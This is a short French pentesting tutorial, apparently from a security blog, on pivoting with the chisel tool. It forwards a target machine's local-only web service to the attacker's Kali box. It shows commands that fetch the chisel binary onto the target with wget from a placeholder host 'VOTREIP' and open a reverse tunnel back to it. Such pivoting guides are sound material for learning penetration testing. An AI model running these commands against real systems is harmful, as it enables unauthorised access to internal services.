Views: 2471
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH.
Mise en pratique de port forwarding avec chisel
Dans notre exemple, nous allons forward un port local de la machine cible vers notre machine kali.
Ici, le port qui nous intéresse est le port 6666 écoutant en local et obtenu grâce à la commande netstat :
netstat -tulpn
Le service en question est un service web :
Nous allons donc importer le binaire chisel sur la machine cible à l’aide des commandes suivantes :
# sur votre machine
python3 -m http.server 8000
# sur la machine cible
wget http://VOTREIP:8000/chisel
chmod +x chisel
Nous avons donc récupéré chisel sur la machine cible, voici donc la partie intéressante :
# sur votre machine
./chisel server -p 8888 -reverse
Et enfin voici la dernière commande à exécuter sur la machine cible :
# sur la machine cible
./chisel client VOTREIP:8888 R:8889:localhost:6666
8888 : port local sur votre machine pour écouter la connexion
6666 : port local du service de la machine cible
8889 : port local sur votre machine pour réceptionner le service souhaité
C’est l’heure de la vérification nous allons donc nous rendre sur firefox afin de constater que nous pouvons bien accéder à ce fameux service :